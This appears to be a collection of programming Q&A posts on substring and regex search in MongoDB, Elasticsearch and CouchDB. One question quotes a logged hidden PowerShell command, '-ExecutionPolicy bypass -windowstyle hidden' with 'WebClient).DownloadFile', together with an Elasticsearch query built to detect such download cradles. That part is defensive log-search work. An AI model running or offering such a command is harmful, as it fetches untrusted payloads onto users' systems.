How to get all the substrings matching a given word, along with their counts, in MongoDB?

I have the following problem retrieving data from MongoDB using Spring Boot.
Here is my schema:
class Item
{
    @Id
    String _id;
    String description;
}
Let's say the database has the following content:
{"Id1", "carrot vegetable"},
{"Id2", "vegies is a brand"},
{"Id3", "I am Vegetarian"},
{"Id4", "Potato vegetable"},
{"Id5", "Fruits"}
What I'm trying to achieve is to get the terms that start with "veg", along with their counts.
That is, something like this:
{"vegetable", 2},
{"vegies", 1},
{"vegetarian", 1}
So far, I have come across the $indexOfCP operator, which can find a substring within a string.
db.Item.aggregate([
  { $match: { description: /veg/i } },
  { $project: { index: { $indexOfCP: [ { $toLower: "$description" }, "veg" ] }, description: 1 } },
  { $sort: { index: 1 } }
])
But I could not find the matching term and its count in the result set.
How can I do this with a mongo command and in Spring Boot?

db.Item.aggregate([
  // Keep only documents whose description contains "veg" (case-insensitive)
  { $match: { description: /veg/i } },
  {
    $project: {
      matchedAndUniqWords: {
        $reduce: {
          // Split the lower-cased description into words and keep those containing "veg"
          input: {
            $filter: {
              input: { $split: [ { $toLower: "$description" }, " " ] },
              as: "w",
              cond: { $ne: [ { $indexOfCP: [ "$$w", "veg" ] }, -1 ] }
            }
          },
          initialValue: [],
          // Accumulate each word only once per document
          in: {
            $cond: [
              { $in: [ "$$this", "$$value" ] },
              "$$value",
              { $concatArrays: [ [ "$$this" ], "$$value" ] }
            ]
          }
        }
      }
    }
  },
  // One document per matched word
  { $unwind: { path: "$matchedAndUniqWords" } },
  // Count how many documents each word appears in
  { $group: { _id: "$matchedAndUniqWords", count: { $sum: 1 } } }
]);
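For the Spring Boot part, here is a minimal sketch using Spring Data MongoDB's MongoTemplate (the collection name "item" and the class/method names are assumptions for illustration; adjust them to your mapping). The $project stage is passed through as a raw Document because $reduce and $filter have no typed builders in the Aggregation API:

import java.util.List;
import java.util.regex.Pattern;

import org.bson.Document;
import org.springframework.data.mongodb.core.MongoTemplate;
import org.springframework.data.mongodb.core.aggregation.Aggregation;
import org.springframework.data.mongodb.core.aggregation.AggregationOperation;
import org.springframework.data.mongodb.core.query.Criteria;

public class VegWordCounter {

    private final MongoTemplate mongoTemplate;

    public VegWordCounter(MongoTemplate mongoTemplate) {
        this.mongoTemplate = mongoTemplate;
    }

    public List<Document> countWordsContainingVeg() {
        // $match: case-insensitive regex on description
        AggregationOperation match = Aggregation.match(
                Criteria.where("description").regex(Pattern.compile("veg", Pattern.CASE_INSENSITIVE)));

        // $project: the same raw stage as in the shell pipeline above
        AggregationOperation project = context -> Document.parse(
                "{ $project: { matchedAndUniqWords: { $reduce: {"
              + " input: { $filter: { input: { $split: [ { $toLower: '$description' }, ' ' ] },"
              + " as: 'w', cond: { $ne: [ { $indexOfCP: [ '$$w', 'veg' ] }, -1 ] } } },"
              + " initialValue: [],"
              + " in: { $cond: [ { $in: [ '$$this', '$$value' ] }, '$$value',"
              + " { $concatArrays: [ [ '$$this' ], '$$value' ] } ] } } } } }");

        Aggregation agg = Aggregation.newAggregation(
                match,
                project,
                Aggregation.unwind("matchedAndUniqWords"),
                Aggregation.group("matchedAndUniqWords").count().as("count"));

        // "item" is the assumed collection name for the Item class
        return mongoTemplate.aggregate(agg, "item", Document.class).getMappedResults();
    }
}

Each result Document then carries the matched word in _id and its count in count, e.g. { "_id" : "vegetable", "count" : 2 }.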

Related

AWS ElasticSearch Query for Keyword not getting results I expect

I have an ElasticSearch query that looks like:
{
  "query": {
    "constant_score": {
      "filter": {
        "bool": {
          "should": [
            {
              "wildcard": {
                "Message.keyword": "*System.Net.WebClient).DownloadString(*"
              }
            },
            {
              "wildcard": {
                "Message.keyword": "*system.net.webclient).downloadfile(*"
              }
            }
          ]
        }
      }
    }
  }
}
And a Doc in my Index that includes:
message:Engine state is changed from None to Available. Details: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.18362.628 HostId=3dd1a50a-cc15-45e0-bf63-4456d556fb67 HostApplication=powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download EngineVersion=5.1.18362.628 RunspaceId=de762b62-056c-4be1-90bf-a12cfe6fbc72
As you can see above it includes:
(New-Object System.Net.WebClient).DownloadFile('https:....
It seems like the filter should match the message, but when I execute the query through Kibana nothing matches, even though I can see the doc above in my index through the Kibana UI if I just query for *.
I think maybe this is because the query above is querying for Message.keyword? How do I get it to successfully hit the document above?
Edit:
mapping: https://pastebin.com/cWN4jF3d
Sample data: https://pastebin.com/SyErqaG8
There are two reasons for the query not returning the result:
1. The field name in the mapping is message, whereas in the query you are using Message.
2. A field with the keyword datatype indexes the data as-is, which means it is case sensitive as well. The document you shared has the text System.Net.WebClient).DownloadFile(, which contains upper-case characters, whereas the pattern you expect it to match, "*system.net.webclient).downloadfile(*", is all lower case.
Therefore the query should be:
{
  "query": {
    "constant_score": {
      "filter": {
        "bool": {
          "should": [
            {
              "wildcard": {
                "message.keyword": "*System.Net.WebClient).DownloadString(*"
              }
            },
            {
              "wildcard": {
                "message.keyword": "*System.Net.WebClient).DownloadFile(*"
              }
            }
          ]
        }
      }
    }
  }
}
The keyword fields are used only for exact matches. If you only want to match a substring/subset of the string, you will need to query the regular text field, i.e. Message instead of Message.keyword:
{
  "query": {
    "constant_score": {
      "filter": {
        "bool": {
          "should": [
            {
              "wildcard": {
                "Message": "*System.Net.WebClient).DownloadString(*"
              }
            },
            {
              "wildcard": {
                "Message": "*system.net.webclient).downloadfile(*"
              }
            }
          ]
        }
      }
    }
  }
}
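Alternatively, if your cluster runs Elasticsearch 7.10 or later (an assumption about your version; check before relying on it), the wildcard query accepts a case_insensitive parameter, so you can keep querying the keyword field without worrying about casing:

{
  "query": {
    "wildcard": {
      "message.keyword": {
        "value": "*system.net.webclient).downloadfile(*",
        "case_insensitive": true
      }
    }
  }
}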

MapReduce in CouchDB and getting the MAX result after MapReduce

I am a beginner with CouchDB.
I have data as below:
one: [
  { "name": "abc", "value": 1 },
  { "name": "efg", "value": 1 },
  { "name": "abc", "value": 1 }
]
I would like to get the count of each distinct name and then get the maximum. E.g. in my case "abc" appears twice, so the maximum (from the reduce function) should return
result: {"name": "abc", "value": 2}
Did you try this design document:
{
  "_id": "_design/company",
  "views": {
    "abc_customers": {
      "map": "function(doc) { if (doc.name == 'abc') emit(doc.name, doc.value) }",
      "reduce": "_count"
    },
    "efg_customers": {
      "map": "function(doc) { if (doc.name == 'efg') emit(doc.name, doc.value) }",
      "reduce": "_count"
    }
  }
}
See the CouchDB documentation for a comparison of _count and _sum; possibly you need _count.
With the above CouchDB design document, you will get a count for each doc.name (abc, efg, ...), and you can then search for the max/min of those counts, e.g. by querying each view with grouping enabled, as shown below.
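For example, assuming your database is named customers (a hypothetical name), the grouped count for the abc view can be read with:
GET /customers/_design/company/_view/abc_customers?group=true
which returns a body of the form {"rows": [{"key": "abc", "value": 2}]}.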

Using regular expressions in elasticsearch term queries

I want to find all items whose ID matches some regular expression like
*TEST123* //pattern for regexp
So the expected results are items
ATEST123001
ATEST123002
ATEST123003
TTTTEST123001
...
I could create a script which scans the full storage and saves the IDs to a log file that I can check later, but I want to find a better solution.
Updated
I tried
"query" : { "match_all" : { }, "filtered" : { "filter" : { "regexp": { "id":".test123." } } } }, }
I receive
//nested: ElasticsearchParseException[Expected field name but got START_OBJECT \"filtered\"]
When I tried
{
  "regexp": {
    "id": "test123"
  }
}
//Parse Failure [No parser for element [regexp]]]
ES 1.7.4 and Lucene 4.10.4
You can use regular expression queries. The regexp query allows you to use regular expressions in term queries.
Ref:
https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl-regexp-query.html
Sample regexp query (note that in Lucene regexp syntax a leading wildcard must be written as .*):
{
  "regexp": {
    "id": ".*test123.*"
  }
}
Update:
In 2.0, the regexp filter has been replaced by the regexp query:
{
  "query": {
    "filtered": {
      "filter": {
        "regexp": {
          "id": ".*TEST123.*"
        }
      }
    }
  }
}
You can try a query_string query:
{
  "query": {
    "query_string": {
      "default_field": "id",
      "query": "*test123*"
    }
  }
}

Query Elasticsearch by id using the regex or wildcard filter

I got a list of IDs:
bc2***********************13
b53***********************92
39f***********************bb
eb7***********************7a
80b***********************22
Each * is an unknown char, and I need to find all IDs matching these patterns.
I tried the regex filter on field names like id, _id and ID, always with "bc2.*13" (among others), but always got no matches, even for existing documents.
By default, the _id field is not indexed: that's why you get no results.
Try setting the _id field as analyzed in the mapping:
POST /test_id/
{
  "mappings": {
    "indexed": {
      "_id": {
        "index": "analyzed"
      }
    }
  }
}
Adding some docs:
PUT /test_id/indexed/bc2***********************13
{
  "content": "test1"
}
PUT /test_id/indexed/b53***********************92
{
  "content": "test2"
}
I checked with one of your simple regexp queries:
POST /test_id/_search
{
  "query": {
    "regexp": {
      "_id": "bc2.*13"
    }
  }
}
Result:
"hits": {
  "total": 1,
  "max_score": 1,
  "hits": [
    {
      "_index": "test_id",
      "_type": "indexed",
      "_id": "bc2***********************13",
      "_score": 1,
      "_source": {
        "content": "test1"
      }
    }
  ]
}
Hope this helps :)
If the *'s are of a known and constant length:
bc2.{23}13|b53.{23}92|39f.{23}bb|eb7.{23}7a|80b.{23}22
DEMO
Else:
bc2.*?13|b53.*?92|39f.*?bb|eb7.*?7a|80b.*?22
DEMO2
Use the _uid field and the wildcard query:
GET yourIndex/yourType/_search
{
  "query": {
    "wildcard": {
      "_uid": "bc2***********************13"
    }
  }
}

Implement auto-complete feature using MongoDB search

I have a MongoDB collection of documents of the form
{
  "id": 42,
  "title": "candy can",
  "description": "canada candy canteen",
  "brand": "cannister candid",
  "manufacturer": "candle canvas"
}
I need to implement an auto-complete feature based on the input search term, matching in all fields except id. For example, if the input term is can, then I should return all matching words in the document, as in
{ hints: ["candy", "can", "canada", "canteen", ...] }
I looked at this question but it didn't help. I also tried searching for how to do a regex search in multiple fields and extract the matching tokens, or how to extract matching tokens in a MongoDB text search, but couldn't find any help.
tl;dr
There is no easy solution for what you want, since normal queries can't modify the fields they return. There is a solution (using the below mapReduce inline instead of doing an output to a collection), but except for very small databases, it is not possible to do this in realtime.
The problem
As written, a normal query can't really modify the fields it returns. But there are other problems. If you want to do a regex search in halfway decent time, you would have to index all fields, which would need a disproportionate amount of RAM for that feature. If you didn't index all fields, a regex search would cause a collection scan, which means that every document would have to be loaded from disk, which would take too much time for autocompletion to be convenient. Furthermore, multiple simultaneous users requesting autocompletion would create considerable load on the backend.
The solution
The problem is quite similar to one I have already answered: we need to extract every word out of multiple fields, remove the stop words, and save the remaining words, together with a link to the respective document(s) they were found in, into a collection. Now, to get an autocompletion list, we simply query the indexed word list.
Step 1: Use a map/reduce job to extract the words
db.yourCollection.mapReduce(
  // Map function
  function() {
    // We need to save this in a local var as per scoping problems
    var document = this;
    // You need to expand this according to your needs
    var stopwords = ["the", "this", "and", "or"];
    for (var prop in document) {
      // We are only interested in strings and explicitly not in _id
      if (prop === "_id" || typeof document[prop] !== 'string') {
        continue;
      }
      document[prop].split(" ").forEach(
        function(word) {
          // You might want to adjust this to your needs
          var cleaned = word.replace(/[;,.]/g, "");
          if (
            // We neither want stopwords...
            stopwords.indexOf(cleaned) > -1 ||
            // ...nor strings which would evaluate to numbers
            !(isNaN(parseInt(cleaned))) ||
            !(isNaN(parseFloat(cleaned)))
          ) {
            return;
          }
          emit(cleaned, document._id);
        }
      );
    }
  },
  // Reduce function
  function(k, v) {
    // Kind of ugly, but works.
    // Improvements more than welcome!
    var values = { 'documents': [] };
    v.forEach(
      function(vs) {
        if (values.documents.indexOf(vs) > -1) {
          return;
        }
        values.documents.push(vs);
      }
    );
    return values;
  },
  {
    // We need this for two reasons...
    finalize: function(key, reducedValue) {
      // First, we ensure that each resulting document
      // has the documents field in order to unify access
      var finalValue = { documents: [] };
      // Second, we ensure that each document is unique in said field
      if (reducedValue.documents) {
        // We filter the existing documents array
        finalValue.documents = reducedValue.documents.filter(
          function(item, pos, self) {
            // The default return value
            var loc = -1;
            for (var i = 0; i < self.length; i++) {
              // We have to do it this way since indexOf only works with primitives
              if (self[i].valueOf() === item.valueOf()) {
                // We have found the value of the current item...
                loc = i;
                // ...so we are done for now
                break;
              }
            }
            // If the location we found equals the position of item, they are equal
            // If it isn't equal, we have a duplicate
            return loc === pos;
          }
        );
      } else {
        finalValue.documents.push(reducedValue);
      }
      // We have sanitized our data, now we can return it
      return finalValue;
    },
    // Our results are written to a collection called "words"
    out: "words"
  }
)
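As mentioned in the tl;dr, for very small databases you could instead get the results back inline rather than writing them to the words collection, by swapping the out option (a sketch; inline output is subject to the 16 MB BSON document limit):
out: { inline: 1 }
With inline output, the words appear in the results field of the mapReduce return value instead of in a collection.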
Running this mapReduce against your example would result in db.words looking like this:
{ "_id" : "can", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "canada", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "candid", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "candle", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "candy", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "cannister", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "canteen", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
{ "_id" : "canvas", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
Note that the individual words are the _id of the documents. The _id field is indexed automatically by MongoDB. Since MongoDB tries to keep indices in RAM, we can do a few tricks to both speed up autocompletion and reduce the load put on the server.
Step 2: Query for autocompletion
For autocompletion, we only need the words, without the links to the documents.
Since the words are indexed, we use a covered query – a query answered only from the index, which usually resides in RAM.
To stick with your example, we would use the following query to get the candidates for autocompletion:
db.words.find({_id:/^can/},{_id:1})
which gives us the result
{ "_id" : "can" }
{ "_id" : "canada" }
{ "_id" : "candid" }
{ "_id" : "candle" }
{ "_id" : "candy" }
{ "_id" : "cannister" }
{ "_id" : "canteen" }
{ "_id" : "canvas" }
Using the .explain() method, we can verify that this query uses only the index.
{
  "cursor" : "BtreeCursor _id_",
  "isMultiKey" : false,
  "n" : 8,
  "nscannedObjects" : 0,
  "nscanned" : 8,
  "nscannedObjectsAllPlans" : 0,
  "nscannedAllPlans" : 8,
  "scanAndOrder" : false,
  "indexOnly" : true,
  "nYields" : 0,
  "nChunkSkips" : 0,
  "millis" : 0,
  "indexBounds" : {
    "_id" : [
      [
        "can",
        "cao"
      ],
      [
        /^can/,
        /^can/
      ]
    ]
  },
  "server" : "32a63f87666f:27017",
  "filterSet" : false
}
Note the indexOnly:true field.
Step 3: Query the actual document
Although we will have to do two queries to get the actual document, since we sped up the overall process, the user experience should be good enough.
Step 3.1: Get the document of the words collection
When the user selects a choice from the autocompletion, we have to query the complete document from words in order to find the documents where the chosen word originated from.
db.words.find({_id:"canteen"})
which would result in a document like this:
{ "_id" : "canteen", "value" : { "documents" : [ ObjectId("553e435f20e6afc4b8aa0efb") ] } }
Step 3.2: Get the actual document
With that document, we can now either show a page with search results or, like in this case, redirect to the actual document which you can get by:
db.yourCollection.find({_id:ObjectId("553e435f20e6afc4b8aa0efb")})
Notes
While this approach may seem complicated at first (well, the mapReduce is a bit), it is actually pretty easy conceptually. Basically, you are trading real-time results (which you won't have anyway unless you spend a lot of RAM) for speed. Imho, that's a good deal. In order to make the rather costly mapReduce phase more efficient, implementing incremental mapReduce could be one approach – improving my admittedly hacked mapReduce might well be another.
Last but not least, this way is a rather ugly hack altogether. You might want to dig into Elasticsearch or Lucene. Those products imho are much, much better suited for what you want.
Thanks to @Markus' solution, I came up with something similar using aggregations instead, knowing that mapReduce is flagged as deprecated for later versions.
const { MongoDBNamespace, Collection } = require('mongodb')

//.replace(/(\b(\w{1,3})\b(\W|$))/g,'').split(/\s+/).join(' ')
const routine = `function (text) {
  const stopwords = ['the', 'this', 'and', 'or', 'id']
  text = text.replace(new RegExp('\\b(' + stopwords.join('|') + ')\\b', 'g'), '')
  text = text.replace(/[;,.]/g, ' ').trim()
  return text.toLowerCase()
}`
// If the pipeline includes the $out operator, aggregate() returns an empty cursor.
const agg = [
  { $match: { a: true, d: false } },
  { $project: { title: 1, desc: 1 } },
  // Merge title and description into a single text field per document
  { $replaceWith: { _id: '$_id', text: { $concat: ['$title', ' ', '$desc'] } } },
  // Strip stopwords and punctuation via the server-side JS routine above
  { $addFields: { cleaned: { $function: { body: routine, args: ['$text'], lang: 'js' } } } },
  { $replaceWith: { _id: '$_id', text: { $trim: { input: '$cleaned' } } } },
  // One array element per word, each carrying a weight of 1
  { $project: { words: { $split: ['$text', ' '] }, qt: { $literal: 1 } } },
  { $unwind: { path: '$words', includeArrayIndex: 'id', preserveNullAndEmptyArrays: true } },
  // Collect the source documents per word and sum up the weights
  { $group: { _id: '$words', docs: { $addToSet: '$_id' }, weight: { $sum: '$qt' } } },
  { $sort: { weight: -1 } },
  { $limit: 100 },
  { $out: { db: 'listings_db', coll: 'words' } },
]
// Closure for db instance only
/**
 * @param { MongoDBNamespace } db
 */
module.exports = function (db) {
  /** @type { Collection } */
  let collection
  /**
   * Runs the aggregation pipeline
   * @return {Promise}
   */
  this.refreshKeywords = async function () {
    collection = db.collection('listing')
    // .toArray() to trigger the aggregation;
    // it returns an empty cursor, so that's fine
    return await collection.aggregate(agg).toArray()
  }
}
Please check it over; only very minimal changes should be needed for your own setup.
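For the autocompletion lookup itself, the resulting words collection can then be queried by prefix, analogous to Step 2 above (a sketch; the weight field comes from the pipeline's $group stage):
db.words.find({ _id: /^can/ }, { _id: 1, weight: 1 }).sort({ weight: -1 })
This returns the candidate words ordered by how often they occur across the source documents.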